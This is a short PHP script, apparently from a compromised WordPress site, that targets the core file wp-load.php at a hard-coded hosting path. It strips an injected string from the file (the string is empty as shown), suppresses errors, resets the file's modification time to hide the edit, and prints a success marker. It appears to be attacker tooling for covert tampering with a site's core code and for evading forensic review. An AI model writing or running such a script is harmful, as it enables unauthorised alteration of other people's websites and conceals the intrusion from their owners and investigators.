<?php  $path = '/home2/duckprog/public_html/wp-load.php'; $ft = @filemtime($path); $new_content = "\n\n".rawurldecode(''); if (file_exists($path) && is_writable($path)) {     $content = file_get_contents($path);     if (strpos($content, $new_content) !== FALSE) {         $content = str_replace($new_content, '', $content);         file_put_contents($path, $content);         @touch($path, $ft);     } } die('!success!');